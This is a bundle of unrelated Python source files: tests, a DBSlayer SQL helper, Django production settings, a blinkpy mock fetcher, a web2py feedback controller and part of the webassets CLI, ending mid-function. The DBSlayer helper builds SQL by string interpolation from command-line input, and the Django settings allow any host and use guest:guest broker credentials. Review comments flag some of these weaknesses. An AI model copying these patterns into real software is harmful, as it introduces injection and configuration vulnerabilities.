                External object ID. Used for integration with third party systems

                
                This attribute is named `externalID` in VSD API.
                
        """
        self._external_id = value

    

    
from mock import patch
from nose.tools import eq_

from helper import TestCase

import appvalidator.submain as submain


class TestSubmainPackage(TestCase):
    """Tests for appvalidator.submain.test_package."""

    @patch("appvalidator.submain.test_inner_package",
           lambda x, z: "success")
    def test_package_pass(self):
        "Tests the test_package function with simple data"

        self.setup_err()

        name = "tests/resources/submain/install_rdf.xpi"
        with open(name) as pack:
            result = submain.test_package(self.err, pack, name)

        self.assert_silent()
        eq_(result, "success")

    @patch("appvalidator.submain.test_inner_package",
           lambda x, z: "success")
    def test_package_not_zip(self):
        # Renamed from `test_package_corrupt`: it shared its name with the
        # corrupt-file test below, so the later definition replaced this one
        # and this test was silently never run.
        "Tests the test_package function fails with a non-zip"

        self.setup_err()

        name = "tests/resources/junk.xpi"
        with open(name) as pack:
            result = submain.test_package(self.err, pack, name)

        self.assert_failed()

    def test_package_corrupt(self):
        "Tests the test_package function fails with a corrupt file"

        self.setup_err()

        name = "tests/resources/corrupt.xpi"
        result = submain.test_package(self.err, name, name)

        self.assert_failed(with_errors=True, with_warnings=True)

# Copyright (C) 2010 CENATIC: Centro Nacional de Referencia de
# Aplicacion de las TIC basadas en Fuentes Abiertas, Spain.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
#   Redistributions of source code must retain the above copyright
#   notice, this list of conditions and the following disclaimer.
#
#   Redistributions in binary form must reproduce the above copyright
#   notice, this list of conditions and the following disclaimer in
#   the documentation and/or other materials provided with the
#   distribution.
#
#   Neither the name of the CENATIC nor the names of its contributors
#   may be used to endorse or promote products derived from this
#   software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# You may contact the copyright holder at: Fundacion CENATIC, Edificio
# de Servicios Sociales: C/ Vistahermosa, 1, 3ra planta, 06200
# Almendralejo (Badajoz), Spain

from DBSlayer import Query

def get_type_name (type_id):
    """Return the name of the asset type *type_id*, or None if unknown."""
    type_info = get_type(type_id)
    if type_info:
        return type_info['name']
    return None

def get_type (type_id):
    # Fetch a single asset-type row as {'id': ..., 'name': ...}.
    # Returns None unless exactly one row matches.
    #
    # NOTE(review): type_id is interpolated directly into the SQL string
    # via "% locals()" -- this is an SQL injection risk when type_id comes
    # from an untrusted source (test() below feeds it from sys.argv).
    # Prefer a parameterized query if the DBSlayer Query API supports it.
    q = "SELECT id, type "\
        "FROM asset_types WHERE id=%(type_id)s;" % locals()

    query = Query(q)
    if len(query) != 1:
        return None

    # The 'type' column is exposed to callers under the key 'name'.
    ret = {'id':          type_id,
           'name':        query['type'][0]}
    return ret

def get_types ():
    """Return every asset type as a list of {'id': ..., 'name': ...} dicts.

    Returns None when the asset_types table is empty.
    """
    # No parameters are interpolated into this statement, so no string
    # formatting is needed.  (The previous "% locals()" was a no-op that
    # would have raised if the SQL ever contained a literal '%'.)
    q = "SELECT id, type "\
        "FROM asset_types;"

    query = Query(q)

    if not len(query):
        return None

    ret = []
    for x in query:
        d = {'id':   query[x]['id'],
             'name': query[x]['type']}
        ret.append(d)
    return ret


def test ():
    """Command-line smoke test: looks up and prints the asset type whose
    id is given as the first command-line argument.

    Exits with status 1 when no type_id argument is supplied.
    (Python 2 print-statement syntax, matching the rest of the module.)
    """
    import sys

    try:
        type_id = sys.argv[1]
    except IndexError:
        print 'Required test parameters: type_id'
        sys.exit(1)

    print 'Types:', get_types()
    print 'type_id %s, type_name %s' % (type_id, get_type_name(type_id))
    print get_type(type_id),

# Allow running this module directly as a command-line smoke test.
if __name__ == '__main__':
    test()

# -*- coding: utf-8 -*-
'''
Production Configurations

- Use djangosecure
- Use mailgun to send emails
- Use redis
'''
from __future__ import absolute_import, unicode_literals

from django.utils import six

from .common import *  # noqa

# SECRET CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Raises ImproperlyConfigured exception if DJANGO_SECRET_KEY not in os.environ
SECRET_KEY = env("DJANGO_SECRET_KEY")

# This ensures that Django will be able to detect a secure connection
# properly on Heroku.
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')

# django-secure
# ------------------------------------------------------------------------------
# django-secure supplies SecurityMiddleware and the SECURE_* checks below.
INSTALLED_APPS += ("djangosecure", )

MIDDLEWARE_CLASSES = (
    # Make sure djangosecure.middleware.SecurityMiddleware is listed first
    'djangosecure.middleware.SecurityMiddleware',
) + MIDDLEWARE_CLASSES

# set this to 60 seconds and then to 518400 when you can prove it works
SECURE_HSTS_SECONDS = 60
SECURE_HSTS_INCLUDE_SUBDOMAINS = env.bool("DJANGO_SECURE_HSTS_INCLUDE_SUBDOMAINS", default=True)
SECURE_FRAME_DENY = env.bool("DJANGO_SECURE_FRAME_DENY", default=True)
SECURE_CONTENT_TYPE_NOSNIFF = env.bool("DJANGO_SECURE_CONTENT_TYPE_NOSNIFF", default=True)
SECURE_BROWSER_XSS_FILTER = True
# Session cookies must only travel over HTTPS in production.  This was
# previously hard-coded to False, which would have exposed the session id
# over plain HTTP even though SECURE_SSL_REDIRECT is enabled below.  Made
# env-configurable (default True) in the same style as the other flags.
SESSION_COOKIE_SECURE = env.bool("DJANGO_SESSION_COOKIE_SECURE", default=True)
SESSION_COOKIE_HTTPONLY = True
SECURE_SSL_REDIRECT = env.bool("DJANGO_SECURE_SSL_REDIRECT", default=True)

# SITE CONFIGURATION
# ------------------------------------------------------------------------------
# Hosts/domain names that are valid for this site
# See https://docs.djangoproject.com/en/1.6/ref/settings/#allowed-hosts
# NOTE(review): "*" disables Django's Host-header validation entirely;
# consider restricting this to the real deployment domain(s).
ALLOWED_HOSTS = ["*"]
# END SITE CONFIGURATION



# EMAIL
# ------------------------------------------------------------------------------
# Outgoing mail goes through Mailgun via django-mailgun; the API key and
# server name must be supplied through the environment.
DEFAULT_FROM_EMAIL = env('DJANGO_DEFAULT_FROM_EMAIL',
                         default='{{cookiecutter.project_name}} <noreply@{{cookiecutter.domain_name}}>')
EMAIL_BACKEND = 'django_mailgun.MailgunBackend'
MAILGUN_ACCESS_KEY = env('DJANGO_MAILGUN_API_KEY')
MAILGUN_SERVER_NAME = env('DJANGO_MAILGUN_SERVER_NAME')
EMAIL_SUBJECT_PREFIX = env("DJANGO_EMAIL_SUBJECT_PREFIX", default='[{{cookiecutter.project_name}}] ')
SERVER_EMAIL = env('DJANGO_SERVER_EMAIL', default=DEFAULT_FROM_EMAIL)

# TEMPLATE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/templates/api/#django.template.loaders.cached.Loader
# Wrap the standard loaders in the cached loader so each template is
# compiled only once per process in production.
TEMPLATES[0]['OPTIONS']['loaders'] = [
    ('django.template.loaders.cached.Loader', [
        'django.template.loaders.filesystem.Loader',
        'django.template.loaders.app_directories.Loader',
    ]),
]

# CACHE CONFIGURATION
# ------------------------------------------------------------------------------
# Redis-backed cache.  The host name 'redis' presumably resolves through
# Docker/compose service discovery -- confirm against the deployment setup.
CACHES = {
    'default': {
        'BACKEND': 'redis_cache.RedisCache',
        'LOCATION': [
            'redis:6379',
        ],
        'OPTIONS': {
            'DB': 1,
            'PARSER_CLASS': 'redis.connection.HiredisParser',
            'CONNECTION_POOL_CLASS': 'redis.BlockingConnectionPool',
            'CONNECTION_POOL_CLASS_KWARGS': {
                'max_connections': 50,
                'timeout': 20,
            },
            'MAX_CONNECTIONS': 1000,
            'PICKLE_VERSION': -1,
        },
    },
}

# ASSET CONFIGURATION
# ------------------------------------------------------------------------------

STATIC_URL = '/static/'
MEDIA_URL = '/media/'

# Collected to fixed absolute container paths rather than under the
# project root.
STATIC_ROOT = '/static'
MEDIA_ROOT = '/media'


STATICFILES_DIRS = (
    unicode(APPS_DIR.path("static")),
)

{% if cookiecutter.use_celery %}
# CELERY BROKER CONFIGURATION
# ------------------------------------------------------------------------------
# RabbitMQ broker, reached via the compose/Docker service name "rabbitmq".
BROKER_URL = "amqp://guest:guest@rabbitmq:5672//"
{% endif %}

{% if cookiecutter.use_sentry %}
# SENTRY CONFIGURATION
# ------------------------------------------------------------------------------
RAVEN_CONFIG = {
    'dsn': env("SENTRY_URL"),
}

INSTALLED_APPS = INSTALLED_APPS + (
    'raven.contrib.django.raven_compat',
)
{% endif %}

# Your production stuff: Below this line define 3rd party library settings

# Copyright (c) 2013 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
#   list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
#   this list of conditions and the following disclaimer in the documentation
#   and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
#   may be used to endorse or promote products derived from this software
#   without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.


"""Package containing the different outputs.

Each output type is defined inside a module.

"""

# Copyright (C) 2011 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
#    * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#    * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
#    * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

from collections import namedtuple

from blinkpy.common.net.results_fetcher import TestResultsFetcher

BuilderStep = namedtuple('BuilderStep', ['build', 'step_name'])

# TODO(qyearsley): To be consistent with other fake ("mock") classes, this
# could be changed so it's not a subclass of TestResultsFetcher.
class MockTestResultsFetcher(TestResultsFetcher):
    """In-memory fake of TestResultsFetcher for use in tests.

    Results, retry summaries and webdriver results are "canned" ahead of
    time via the set_* methods and served back by the matching fetch_*
    methods; fetches are also recorded in ``fetched_builds`` /
    ``fetched_webdriver_builds`` so tests can assert what was requested.
    """

    def __init__(self):
        super(MockTestResultsFetcher, self).__init__()
        # Keyed by BuilderStep for fetch_results(); the resultdb variants
        # reuse the same dict keyed by build_id.
        self._canned_results = {}
        self._canned_retry_summary_json = {}
        self._webdriver_results = {}
        # Records of fetch calls, for assertions in tests.
        self.fetched_builds = []
        self.fetched_webdriver_builds = []
        self._layout_test_step_name = 'blink_web_tests (with patch)'

    def set_results(self, build, results, step_name=None):
        # Can results for (build, step); defaults to the configured step.
        step_name = step_name or self.get_layout_test_step_name(build)
        step = BuilderStep(build=build, step_name=step_name)
        self._canned_results[step] = results

    def fetch_results(self, build, full=False, step_name=None):
        # ``full`` is accepted for interface compatibility but unused here.
        step_name = step_name or self.get_layout_test_step_name(build)
        step = BuilderStep(build=build, step_name=step_name)
        self.fetched_builds.append(step)
        return self._canned_results.get(step)

    def set_results_to_resultdb(self, build, results):
        self._canned_results[build.build_id] = results

    def fetch_results_from_resultdb(self, host, builds, predicate):
        # ``host`` and ``predicate`` are accepted for interface
        # compatibility but ignored by this fake.
        rv = []
        for build in builds:
            results = self._canned_results.get(build.build_id)
            if results:
                rv.extend(results)
        return rv

    def set_webdriver_test_results(self, build, m, results):
        self._webdriver_results[(build, m)] = results

    def fetch_webdriver_test_results(self, build, m):
        self.fetched_webdriver_builds.append((build, m))
        return self._webdriver_results.get((build, m))

    def set_retry_sumary_json(self, build, content):
        # NOTE(review): "sumary" is misspelled, but the name presumably
        # mirrors the production interface -- verify before renaming.
        self._canned_retry_summary_json[build] = content

    def fetch_retry_summary_json(self, build):
        return self._canned_retry_summary_json.get(build)

    def set_layout_test_step_name(self, name):
        self._layout_test_step_name = name

    def get_layout_test_step_name(self, build):
        # ``build`` is unused; the fake returns one configured name.
        return self._layout_test_step_name

# -*- coding: utf-8 -*-

import access
import util

@auth.requires_login()
def index():
    """Produces a list of the feedback obtained for a given venue,
    or for all venues."""
    venue_id = request.args(0)
    # Restrict to the current user's submissions, optionally narrowed
    # to a single venue.
    query = (db.submission.user == get_user_email())
    if venue_id != 'all':
        query &= (db.submission.venue_id == venue_id)
    db.submission.id.represent = lambda x, r: A(T('View'), _class='btn', _href=URL('submission', 'view_own_submission', args=['v', r.id]))
    db.submission.id.label = T('Submission')
    db.submission.id.readable = True
    db.submission.venue_id.readable = True
    grid = SQLFORM.grid(query,
        fields=[db.submission.id, db.submission.venue_id,
                db.submission.date_created, db.submission.date_updated, ],
        csv=False, details=False, create=False, editable=False, deletable=False,
        args=request.args[:1],
        maxtextlength=24,
        )
    return dict(grid=grid)


@auth.requires_login()
def view_feedback():
    """Shows detailed feedback for a user in a venue.
    This controller accepts various types of arguments: 
    * 's', submission_id
    * 'u', venue_id, username
    * 'v', venue_id  (in which case, shows own submission to that venue)
    """
    if len(request.args) == 0:
        redirect(URL('default', 'index'))
    # Resolve the submission (subm), venue (c) and submission author
    # (username) from the polymorphic argument list.  n_args is the number
    # of request args that identify this page; it is passed to the grid
    # below so grid navigation preserves them.
    if request.args(0) == 's':
        # submission_id
        n_args = 2
        subm = db.submission(request.args(1)) or redirect(URL('default', 'index'))
        c = db.venue(subm.venue_id) or redirect(URL('default', 'index'))
        username = subm.user
    elif request.args(0) == 'v':
        # venue_id
        n_args = 2
        c = db.venue(request.args(1)) or redirect(URL('default', 'index'))
        username = get_user_email()
        subm = db((db.submission.user == username) & (db.submission.venue_id == c.id)).select().first()
    else:
        # venue_id, username
        n_args = 3
        c = db.venue(request.args(1)) or redirect(URL('default', 'index'))
        username = request.args(2) or redirect(URL('default', 'index'))
        subm = db((db.submission.user == username) & (db.submission.venue_id == c.id)).select().first()

    # Checks permissions.
    props = db(db.user_properties.user == get_user_email()).select().first()
    if props == None:
        session.flash = T('Not authorized.')
        redirect(URL('default', 'index'))
    is_author = (username == get_user_email())
    # Authors can always see their own feedback; everyone else needs
    # venue-level feedback-viewing rights.
    can_view_feedback = access.can_view_feedback(c, props) or is_author
    if (not can_view_feedback):
        session.flash = T('Not authorized.')
        redirect(URL('default', 'index'))
    # Non-observers must additionally wait until the rating phase closes.
    if not (access.can_view_feedback(c, props) or datetime.utcnow() > c.rate_close_date):
        session.flash = T('The ratings are not yet available.')
        redirect(URL('feedback', 'index', args=['all']))

    # Produces the link to edit the feedback.
    edit_feedback_link = None
    if subm is not None and access.can_observe(c, props):
        edit_feedback_link = A(T('Edit feedback'), _class='btn', 
                               _href=URL('submission', 'edit_feedback', args=[subm.id]))
    # Produces the download link.
    download_link = None
    if subm is not None and c.allow_file_upload and subm.content is not None:
        if is_author:
            download_link = A(T('Download'), _class='btn', 
                          _href=URL('submission', 'download_author', args=[subm.id, subm.content]))
        else:
            download_link = A(T('Download'), _class='btn', 
                          _href=URL('submission', 'download_manager', args=[subm.id, subm.content]))
    venue_link = A(c.name, _href=URL('venues', 'view_venue', args=[c.id]))

    # Submission link.
    subm_link = None
    if subm is not None and c.allow_link_submission:
        subm_link = A(subm.link, _href=subm.link)
    # Submission content and feedback.
    # The comment/feedback fields hold keystore ids; keystore_read
    # resolves them to the stored text before MARKMIN rendering.
    subm_comment = None
    subm_feedback = None
    if subm is not None:
        raw_subm_comment = keystore_read(subm.comment)
        if raw_subm_comment is not None and len(raw_subm_comment) > 0:
            subm_comment = MARKMIN(keystore_read(subm.comment))
        raw_feedback = keystore_read(subm.feedback)
        if raw_feedback is not None and len(raw_feedback) > 0:
            subm_feedback = MARKMIN(raw_feedback)
    # Display settings.
    db.submission.percentile.readable = True
    db.submission.comment.readable = True
    db.submission.feedback.readable = True
    if access.can_observe(c, props):
        db.submission.quality.readable = True
        db.submission.error.readable = True
    # Reads the grade information.
    submission_grade = submission_percentile = None
    review_grade = review_percentile = user_reputation = None
    final_grade = final_percentile = None
    assigned_grade = None
    if c.grades_released:
        grade_info = db((db.grades.user == username) & (db.grades.venue_id == c.id)).select().first()
        if grade_info is not None:
            submission_grade = represent_quality(grade_info.submission_grade, None)
            submission_percentile = represent_percentage(grade_info.submission_percentile, None)
            review_grade = represent_quality_10(grade_info.accuracy, None)
            review_percentile = represent_percentage(grade_info.accuracy_percentile, None)
            user_reputation = represent_01_as_percentage(grade_info.reputation, None)
            final_grade = represent_quality(grade_info.grade, None)
            final_percentile = represent_percentage(grade_info.percentile, None)
            assigned_grade = represent_quality(grade_info.assigned_grade, None)
    # Makes a grid of comments.
    db.task.submission_name.readable = False
    db.task.assigned_date.readable = False
    db.task.completed_date.readable = False
    db.task.rejected.readable = True
    db.task.helpfulness.readable = db.task.helpfulness.writable = True
    # Prevent editing the comments; the only thing editable should be the "is bogus" field.
    db.task.comments.writable = False
    db.task.comments.readable = True
    ranking_link = None
    if access.can_observe(c, props):
        # Observers see reviewer identities and get extra drill-down links.
        db.task.user.readable = True
        db.task.completed_date.readable = True
        links = [
            dict(header=T('Review details'), body= lambda r:
                 A(T('View'), _class='btn', _href=URL('ranking', 'view_comparison', args=[r.id]))),
            ]
        details = False
        if subm is not None:
            ranking_link = A(T('details'), _href=URL('ranking', 'view_comparisons_given_submission', args=[subm.id]))
        reviews_link = A(T('details'), _href=URL('ranking', 'view_comparisons_given_user', args=[username, c.id]))
        db.task.user.represent = lambda v, r: A(v, _href=URL('ranking', 'view_comparisons_given_user',
                                                                   args=[v, c.id], user_signature=True))
    else:
        # Non-observers only get a "give feedback on this review" action.
        user_reputation = None
        links = [
            dict(header=T('Review feedback'), body = lambda r:
                 A(T('Give feedback'), _class='btn', 
                   _href=URL('feedback', 'reply_to_review', args=[r.id], user_signature=True))),
            ]
        details = False
        ranking_link = None
        reviews_link = None
    if subm is not None:
        q = ((db.task.submission_id == subm.id) & (db.task.is_completed == True))
        # q = (db.task.submission_id == subm.id)
    else:
        # No submission: use an always-empty query so the grid renders empty.
        q = (db.task.id == -1)
    grid = SQLFORM.grid(q,
        fields=[db.task.id, db.task.user, db.task.rejected, db.task.comments, db.task.helpfulness, ],
        details = details,
        csv=False, create=False, editable=False, deletable=False, searchable=False,
        links=links,
        args=request.args[:n_args],
        maxtextlength=24,
        )
    return dict(subm=subm, download_link=download_link, subm_link=subm_link, username=username,
                subm_comment=subm_comment, subm_feedback=subm_feedback,
                edit_feedback_link=edit_feedback_link,
                is_admin=is_user_admin(), 
                submission_grade=submission_grade, submission_percentile=submission_percentile, 
                review_grade=review_grade, review_percentile=review_percentile,
                user_reputation=user_reputation,
                final_grade=final_grade, final_percentile=final_percentile, 
                assigned_grade=assigned_grade,
                venue_link=venue_link, grid=grid, ranking_link=ranking_link,
                reviews_link=reviews_link)


@auth.requires_signature()
def reply_to_review():
    """Lets the submission author rate and reply to a single review (task).

    Expects the task id in request.args(0); the request must carry a valid
    signature (links are generated with user_signature=True).
    """
    t = db.task(request.args(0)) or redirect(URL('default', 'index'))
    # Only the helpfulness rating and the feedback text are editable.
    db.task.submission_name.readable = False
    db.task.assigned_date.readable = False
    db.task.completed_date.readable = False
    db.task.comments.readable = False
    db.task.helpfulness.readable = db.task.helpfulness.writable = True
    db.task.feedback.readable = db.task.feedback.writable = True
    form = SQLFORM(db.task, record=t)
    # The feedback field stores a keystore id; show the resolved text.
    form.vars.feedback = keystore_read(t.feedback)
    if form.process(onvalidation=validate_review_feedback(t)).accepted:
        session.flash = T('Updated.')
        redirect(URL('feedback', 'view_feedback', args=['s', t.submission_id]))
    link_to_submission = A(T('View submission'), _href=URL('submission', 'view_own_submission', args=['v', t.submission_id]))
    review_comments = MARKMIN(keystore_read(t.comments))
    return dict(form=form, link_to_submission=link_to_submission, review_comments=review_comments)
    

def validate_review_feedback(t):
    """Return an onvalidation callback that persists the feedback text.

    On a valid form the text entered by the user is written to the
    keystore, and the form value is replaced by the keystore id that ends
    up stored on the task record.
    """
    def _on_validate(form):
        if form.errors:
            return
        form.vars.feedback = keystore_update(t.feedback, form.vars.feedback)
    return _on_validate


@auth.requires_login()
def view_my_reviews():
    """Displays the reviews the current user has written for a venue,
    together with the feedback those reviews received."""
    venue = db.venue(request.args(0)) or redirect(URL('rating', 'review_index'))
    link_to_venue = A(venue.name, _href=URL('venues', 'view_venue', args=[venue.id]))
    link_to_eval = A(T('My evaluation in this venue'), _class='btn',
                     _href=URL('feedback', 'view_feedback', args=['v', venue.id]))
    # Only this user's review tasks for this venue.
    query = ((db.task.user == get_user_email()) & (db.task.venue_id == venue.id))
    for field in (db.task.rejected, db.task.helpfulness,
                  db.task.comments, db.task.feedback):
        field.readable = True
    # Show the full submission name instead of a truncated one.
    db.task.submission_name.represent = represent_text_field
    grid = SQLFORM.grid(query,
        fields=[db.task.submission_name, db.task.rejected, db.task.helpfulness],
        details=True,
        editable=False, deletable=False, create=False, searchable=False,
        csv=False,
        args=request.args[:1],
        maxtextlength=24,
        )
    return dict(grid=grid, link_to_venue=link_to_venue, link_to_eval=link_to_eval)

from __future__ import print_function
import shutil
import os, sys
import time
import logging

from .loaders import PythonLoader, YAMLLoader
from .bundle import get_all_bundle_files
from .exceptions import BuildError
from .updater import TimestampUpdater
from .merge import MemoryHunk
from .version import get_manifest
from .cache import FilesystemCache
from .utils import set, StringIO


# Public API of this module.
__all__ = ('CommandError', 'CommandLineEnvironment', 'main')


# logging has WARNING as default level, for the CLI we want INFO. Set this
# as early as possible, so that user customizations will not be overwritten.
logging.getLogger('webassets.script').setLevel(logging.INFO)


class CommandError(Exception):
    """Raised by commands for user-facing errors (e.g. bad arguments)."""
    pass


class Command(object):
    """Base-class for a command used by :class:`CommandLineEnvironment`.

    Each command being a class opens up certain possibilities with respect to
    subclassing and customizing the default CLI.
    """

    def __init__(self, cmd_env):
        # cmd_env is the owning CommandLineEnvironment instance.
        self.cmd = cmd_env

    def __getattr__(self, name):
        # Make stuff from cmd environment easier to access
        # (e.g. self.environment and self.log resolve through self.cmd).
        return getattr(self.cmd, name)

    def __call__(self, *args, **kwargs):
        # Subclasses implement the actual command logic here.
        raise NotImplementedError()


class BuildCommand(Command):

    def __call__(self, bundles=None, output=None, directory=None, no_cache=None,
              manifest=None, production=None):
        """Build assets.

        ``bundles``
            A list of bundle names. If given, only this list of bundles
            should be built.

        ``output``
            List of (bundle, filename) 2-tuples. If given, only these
            bundles will be built, using the custom output filenames.
            Cannot be used with ``bundles``.

        ``directory``
            Custom output directory to use for the bundles. The original
            basenames defined in the bundle ``output`` attribute will be
            used. If the ``output`` of the bundles are pointing to different
            directories, they will be offset by their common prefix.
            Cannot be used with ``output``.

        ``no_cache``
            If set, a cache (if one is configured) will not be used.

        ``manifest``
            If set, the given manifest instance will be used, instead of
            any that might have been configured in the Environment. The value
            passed will be resolved through ``get_manifest()``. If this fails,
            a file-based manifest will be used using the given value as the
            filename.

        ``production``
            If set to ``True``, then :attr:`Environment.debug`` will forcibly
            be disabled (set to ``False``) during the build.

        Returns 2 when at least one bundle failed to build; None otherwise.
        """

        # Validate arguments
        if bundles and output:
            raise CommandError(
                'When specifying explicit output filenames you must '
                'do so for all bundles you want to build.')
        if directory and output:
            raise CommandError('A custom output directory cannot be '
                               'combined with explicit output filenames '
                               'for individual bundles.')

        if production:
            # TODO: Reset again (refactor commands to be classes)
            self.environment.debug = False

        # TODO: Oh how nice it would be to use the future options stack.
        if manifest is not None:
            try:
                manifest = get_manifest(manifest, env=self.environment)
            except ValueError:
                manifest = get_manifest(
                    # abspath() is important, or this will be considered
                    # relative to Environment.directory.
                    "file:%s" % os.path.abspath(manifest),
                    env=self.environment)
            self.environment.manifest = manifest

        # Use output as a dict mapping bundle name -> custom filename.
        if output:
            output = dict(output)

        # Validate bundle names
        bundle_names = bundles if bundles else (output.keys() if output else [])
        for name in bundle_names:
            if name not in self.environment:
                raise CommandError(
                    'I do not know a bundle name named "%s".' % name)

        # Make a list of bundles to build, and the filename to write to.
        if bundle_names:
            # TODO: It's not ok to use an internal property here.
            bundles = [(n, b) for n, b in self.environment._named_bundles.items()
                             if n in bundle_names]
        else:
            # Includes unnamed bundles as well.
            bundles = [(None, b) for b in self.environment]

        # Determine common prefix for use with ``directory`` option.
        if directory:
            prefix = os.path.commonprefix(
                [os.path.normpath(b.resolve_output())
                 for _, b in bundles if b.output])
            # dirname() gives the right value for a single file.
            prefix = os.path.dirname(prefix)

        to_build = []
        for name, bundle in bundles:
            # TODO: We really should support this. This error here
            # is just in place of a less understandable error that would
            # otherwise occur.
            if bundle.is_container and directory:
                raise CommandError(
                    'A custom output directory cannot currently be '
                    'used with container bundles.')

            # Determine which filename to use, if not the default.
            overwrite_filename = None
            if output:
                overwrite_filename = output[name]
            elif directory:
                offset = os.path.normpath(
                    bundle.resolve_output())[len(prefix)+1:]
                overwrite_filename = os.path.join(directory, offset)
            to_build.append((bundle, overwrite_filename, name,))

        # Build.
        built = []
        for bundle, overwrite_filename, name in to_build:
            if name:
                # A name is not necessarily available if the bundle was
                # registered without one.
                self.log.info("Building bundle: %s (to %s)" % (
                    name, overwrite_filename or bundle.output))
            else:
                self.log.info("Building bundle: %s" % bundle.output)

            try:
                if not overwrite_filename:
                    with bundle.bind(self.environment):
                        bundle.build(force=True, disable_cache=no_cache)
                else:
                    # TODO: Rethink how we deal with container bundles here.
                    # As it currently stands, we write all child bundles
                    # to the target output, merged (which is also why we
                    # create and force writing to a StringIO instead of just
                    # using the ``Hunk`` objects that build() would return
                    # anyway).
                    # NOTE: a dedicated buffer variable is used here rather
                    # than rebinding the ``output`` argument, which holds
                    # the name -> filename mapping.
                    buf = StringIO()
                    with bundle.bind(self.environment):
                        bundle.build(force=True, output=buf,
                            disable_cache=no_cache)
                    if directory:
                        # Only auto-create directories in this mode.
                        output_dir = os.path.dirname(overwrite_filename)
                        if not os.path.exists(output_dir):
                            os.makedirs(output_dir)
                    MemoryHunk(buf.getvalue()).save(overwrite_filename)
                built.append(bundle)
            except BuildError as e:
                self.log.error("Failed, error was: %s" % e)

        # Fire the post-build hook once if anything succeeded; signal
        # partial failure to the caller with a non-zero exit code.
        if len(built):
            self.event_handlers['post_build']()
        if len(built) != len(to_build):
            return 2


class WatchCommand(Command):

    def __call__(self, loop=None):
        """Watch assets for changes.

        ``loop``
            A callback, taking no arguments, to be called once every loop
            iteration. Can be useful to integrate the command with other code.
            If not specified, the loop will call ``time.sleep()``.
        """
        # TODO: This should probably also restart when the code changes.
        mtimes = {}

        try:
            # Before starting to watch for changes, also recognize changes
            # made while we did not run, and apply those immediately.
            for bundle in self.environment:
                print('Bringing up to date: %s' % bundle.output)
                bundle.build(force=False)

            self.log.info("Watching %d bundles for changes..." %
                          len(self.environment))

            while True:
                changed_bundles = self.check_for_changes(mtimes)

                built = []
                for bundle in changed_bundles:
                    print("Building bundle: %s ..." % bundle.output, end=' ')
                    sys.stdout.flush()
